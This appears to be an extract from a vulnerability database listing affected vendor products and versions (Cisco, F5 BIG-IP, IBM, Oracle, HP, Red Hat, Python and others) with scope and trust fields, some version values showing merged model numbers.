vendor:	cisco	model:	nac appliance clean access server	scope:	eq	version:	-0	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	ne	version:	1.1.1.4	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	eq	version:	60000	Trust: 0.3
vendor:	cisco	model:	video distribution suite for internet streaming	scope:	ne	version:	4.003(002)	Trust: 0.3
vendor:	cisco	model:	firesight system software	scope:	ne	version:	6.1.0.1	Trust: 0.3
vendor:	cisco	model:	webex meetings for windows phone	scope:	eq	version:	80	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	cisco	model:	spa232d multi-line dect analog telephone adapter	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.1.1	Trust: 0.3
vendor:	cisco	model:	prime optical for service providers	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	smart care	scope:	eq	version:	0	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	8	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.6.0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	ne	version:	5.3.1.11	Trust: 0.3
vendor:	cisco	model:	universal small cell cloudbase factory recovery root filesystem	scope:	eq	version:	2.99.4	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	f5	model:	big-ip pem hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	edge digital media player 1.2rb1.0.3	scope:	ne	version:	340	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.5	Trust: 0.3
vendor:	cisco	model:	network performance analysis	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	netapp	model:	manageability sdk	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip conference phone for third-party call control	scope:	eq	version:	88310	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	ne	version:	60006.2.19	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	ne	version:	1.5.2.5	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.1	Trust: 0.3
vendor:	cisco	model:	webex meetings for windows phone	scope:	ne	version:	82.8	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.2.0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.4	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	ibm	model:	spectrum control	scope:	eq	version:	5.2.10	Trust: 0.3
vendor:	cisco	model:	universal small cell cloudbase factory recovery root filesystem	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.7	Trust: 0.3
vendor:	ibm	model:	smartcloud entry	scope:	eq	version:	2.3.0	Trust: 0.3
vendor:	cisco	model:	secure access control system	scope:	ne	version:	5.8.0.32.7	Trust: 0.3
vendor:	redhat	model:	enterprise linux server extended update support	scope:	eq	version:	-7.5	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	cisco	model:	telepresence integrator c series ce8.2.2	scope:	ne	version:	-	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment intirim fix	scope:	eq	version:	5.133	Trust: 0.3
vendor:	oracle	model:	secure global desktop	scope:	eq	version:	5.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.9	Trust: 0.3
vendor:	ibm	model:	cognos business intelligence server	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	cisco	model:	webex meetings client hosted	scope:	eq	version:	-0	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.13	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	ne	version:	14.0	Trust: 0.3
vendor:	cisco	model:	content security management appliance	scope:	ne	version:	6.1.140	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.8	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	11.523	Trust: 0.3
vendor:	ibm	model:	security virtual server protection for vmware	scope:	eq	version:	1.1	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0	Trust: 0.3
vendor:	cisco	model:	stealthwatch udp director	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	cisco	model:	intrusion prevention system solutions	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	4.6	Trust: 0.3
vendor:	cisco	model:	unified ip conference phone	scope:	eq	version:	88310	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.2.1	Trust: 0.3
vendor:	redhat	model:	enterprise linux server update services for sap solutions	scope:	eq	version:	-7.6	Trust: 0.3
vendor:	cisco	model:	nexus series switches 5.2.8	scope:	ne	version:	6000	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.14	Trust: 0.3
vendor:	ibm	model:	smartcloud entry appliance fp	scope:	eq	version:	3.1.0.4	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.53	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.50	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.9	Trust: 0.3
vendor:	ibm	model:	communications server for windows	scope:	eq	version:	6.1.3	Trust: 0.3
vendor:	cisco	model:	jabber client framework components	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	prime ip express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified sip proxy software	scope:	ne	version:	10	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.4	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	oracle	model:	mysql workbench	scope:	eq	version:	6.1.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	cisco	model:	security manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	netflow generation appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	jabber for mac	scope:	ne	version:	11.8	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.403	Trust: 0.3
vendor:	ibm	model:	websphere application server	scope:	eq	version:	9.0	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4.3	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	12.202	Trust: 0.3
vendor:	cisco	model:	unified sip proxy software	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	99510	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.1.3	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	89450	Trust: 0.3
vendor:	cisco	model:	telepresence supervisor mse	scope:	eq	version:	80500	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment build	scope:	eq	version:	7.1.1.20280.6	Trust: 0.3
vendor:	ibm	model:	db2® advanced workgroup server edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	cisco	model:	telepresence server and mse	scope:	ne	version:	701087104.4	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.10	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.6	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.12	Trust: 0.3
vendor:	cisco	model:	ucs series and series fabric interconnects	scope:	eq	version:	620063000	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.2.2	Trust: 0.3
vendor:	cisco	model:	webex meeting center	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.11	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	12.0	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0.4	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	6.6.0.0	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	41.32	Trust: 0.3
vendor:	ibm	model:	db2® direct standard edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	ne	version:	8.0.4.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	12.0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	netflow generation appliance	scope:	ne	version:	1.1(1)	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian extended update support	scope:	eq	version:	-7.6	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.8	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.13	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.6	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.5.2	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.2.2	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.6	Trust: 0.3
vendor:	oracle	model:	secure global desktop	scope:	eq	version:	4.71	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.11	Trust: 0.3
vendor:	ibm	model:	db2® connect? application server edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.0	Trust: 0.3
vendor:	ibm	model:	db2® express edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	cisco	model:	socialminer	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	powerkvm update	scope:	ne	version:	2.1.1.3-6513	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.28	Trust: 0.3
vendor:	ibm	model:	websphere application server	scope:	eq	version:	8.5.5	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	11.522	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.3.2.0	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.03	Trust: 0.3
vendor:	cisco	model:	webex meetings server	scope:	eq	version:	2.0	Trust: 0.3
vendor:	cisco	model:	spa112 2-port phone adapter	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	intracer	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	video surveillance series high-definition ip cameras	scope:	ne	version:	40002.9	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.29	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.18	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment build	scope:	eq	version:	5.1.1051.07	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems extended update support	scope:	eq	version:	-7.5	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.4.0	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	cisco	model:	jabber for windows	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	oss support tools	scope:	eq	version:	8.8.15.7.15	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	41.30	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.1.3	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf1	scope:	ne	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	12.534	Trust: 0.3
vendor:	cisco	model:	telepresence video communication server	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	prime infrastructure	scope:	ne	version:	3.2	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	9.1	Trust: 0.3
vendor:	cisco	model:	video surveillance 4300e and 4500e high-definition ip cameras	scope:	ne	version:	2.9	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5	Trust: 0.3
vendor:	ibm	model:	db2 direct advanced edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	ibm	model:	powerkvm update	scope:	ne	version:	3.1.0.23	Trust: 0.3
vendor:	cisco	model:	computer telephony integration object server	scope:	ne	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	eq	version:	11000	Trust: 0.3
vendor:	cisco	model:	telepresence sx series	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	12.0	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.2	Trust: 0.3
vendor:	cisco	model:	telepresence server on multiparty media and	scope:	eq	version:	3103200	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.24	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	cisco	model:	content security appliance update servers	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	videoscape anyres live	scope:	ne	version:	9.7.2	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	99710	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	5.0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.6	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.9	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system i®	scope:	eq	version:	10.5	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	ne	version:	7.0.10.1	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.2.3	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	5.1.0.2	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	10.0	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.4	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	firesight system software	scope:	ne	version:	5.4.1.9	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.13	Trust: 0.3
vendor:	cisco	model:	universal small cell iuh	scope:	ne	version:	3.17.3	Trust: 0.3
vendor:	cisco	model:	ata analog telephone adaptor	scope:	eq	version:	1870	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.1.1	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.2	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.44	Trust: 0.3
vendor:	cisco	model:	ios and cisco ios xe software	scope:	ne	version:	16.4	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	ne	version:	500-326.1	Trust: 0.3
vendor:	f5	model:	big-iq adc	scope:	eq	version:	4.5	Trust: 0.3
vendor:	cisco	model:	unity express	scope:	ne	version:	10	Trust: 0.3
vendor:	ibm	model:	mobile connect	scope:	eq	version:	6.1.5.2	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.20	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.4	Trust: 0.3
vendor:	cisco	model:	expressway series	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	cisco	model:	small business series managed switches	scope:	eq	version:	3000	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	ne	version:	5.1.8	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	ne	version:	1.2.0.15	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	13.1	Trust: 0.3
vendor:	f5	model:	big-iq cloud	scope:	eq	version:	4.1	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.3.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	13.0	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	8.2	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0.6	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	ne	version:	10006.1	Trust: 0.3
vendor:	cisco	model:	telepresence isdn gateway	scope:	eq	version:	32410	Trust: 0.3
vendor:	ibm	model:	db2® advanced workgroup server edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	cisco	model:	telepresence mcu	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	13.1	Trust: 0.3
vendor:	cisco	model:	edge digital media player	scope:	eq	version:	3000	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	13.0	Trust: 0.3
vendor:	cisco	model:	series smart plus switches	scope:	eq	version:	2200	Trust: 0.3
vendor:	ibm	model:	smartcloud entry	scope:	eq	version:	3.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.0.0	Trust: 0.3
vendor:	ibm	model:	smartcloud entry appliance fi	scope:	eq	version:	2.4.0.4	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.21	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	eq	version:	1000v0	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	eq	version:	7.0.9.60	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.5.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.5	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.1.6	Trust: 0.3
vendor:	cisco	model:	virtual security gateway	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	ibm	model:	db2® connect? enterprise edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	13.0	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.5.2	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.1.5	Trust: 0.3
vendor:	cisco	model:	telepresence tx9000 series	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	smartcloud entry appliance fp	scope:	eq	version:	3.2.0.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	cisco	model:	series digital media players	scope:	eq	version:	43000	Trust: 0.3
vendor:	cisco	model:	telepresence system series	scope:	ne	version:	30006.1	Trust: 0.3
vendor:	hp	model:	performance center agent	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	universal small cell series	scope:	eq	version:	70003.4.2.0	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	12.01	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian	scope:	eq	version:	7	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.4	Trust: 0.3
vendor:	cisco	model:	unity connection	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	loadrunner patch4	scope:	eq	version:	11.0	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4.6	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.1.0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.12	Trust: 0.3
vendor:	cisco	model:	security manager	scope:	ne	version:	4.13	Trust: 0.3
vendor:	cisco	model:	ucs b-series blade servers	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	vios	scope:	eq	version:	2.2	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	13.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	cisco	model:	ucs standalone c-series rack server integrated management cont	scope:	eq	version:	-0	Trust: 0.3
vendor:	ibm	model:	communications server for linux	scope:	eq	version:	6.4	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.0.1	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	ne	version:	5.3.2.5	Trust: 0.3
vendor:	netapp	model:	e-series santricity storage manager	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	spectrum control	scope:	eq	version:	5.2.9	Trust: 0.3
vendor:	cisco	model:	telepresence integrator c series	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.53	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.6.0.0	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	13.0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.32	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-iq cloud and orchestration	scope:	eq	version:	1.0	Trust: 0.3
vendor:	cisco	model:	enterprise content delivery system	scope:	ne	version:	2.6.9	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	eq	version:	60000	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.5.1	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	7	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	mds series multilayer switches 5.2.8	scope:	ne	version:	9000	Trust: 0.3
vendor:	cisco	model:	series digital media players 5.4.1 rb4	scope:	ne	version:	4300	Trust: 0.3
vendor:	cisco	model:	ucs standalone c-series rack server integrated management cont	scope:	ne	version:	-3.0	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	5.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.2.1	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	4	Trust: 0.3
vendor:	cisco	model:	ios and cisco ios xe software	scope:	ne	version:	16.1	Trust: 0.3
vendor:	cisco	model:	prime network	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	telepresence tx9000 series	scope:	ne	version:	6.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.2.0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	prime performance manager	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system z®	scope:	eq	version:	10.1	Trust: 0.3
vendor:	cisco	model:	smart net total care local collector appliance	scope:	eq	version:	-0	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.12	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4.2	Trust: 0.3
vendor:	ibm	model:	db2® enterprise server edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	cisco	model:	connected grid routers	scope:	ne	version:	15.8.9	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.5.2	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4.5	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	41.13	Trust: 0.3
vendor:	cisco	model:	nexus series fabric switches aci mode	scope:	eq	version:	9000-0	Trust: 0.3
vendor:	ibm	model:	worklight consumer edition	scope:	eq	version:	6.1.0.1	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.12	Trust: 0.3
vendor:	cisco	model:	prime performance manager sp1611	scope:	ne	version:	1.7	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.22	Trust: 0.3
vendor:	cisco	model:	unified ip phone 9.3 sr3	scope:	ne	version:	6901	Trust: 0.3
vendor:	redhat	model:	enterprise linux eus compute node	scope:	eq	version:	7.6	Trust: 0.3
vendor:	redhat	model:	enterprise linux for scientific computing	scope:	eq	version:	7	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.16	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	7	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.23	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.10	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	ne	version:	13.0.1	Trust: 0.3
vendor:	cisco	model:	telepresence server and mse	scope:	eq	version:	701087100	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	12.2	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.1.3	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	9.1	Trust: 0.3
vendor:	cisco	model:	mds series multilayer switches	scope:	ne	version:	90006.2.19	Trust: 0.3
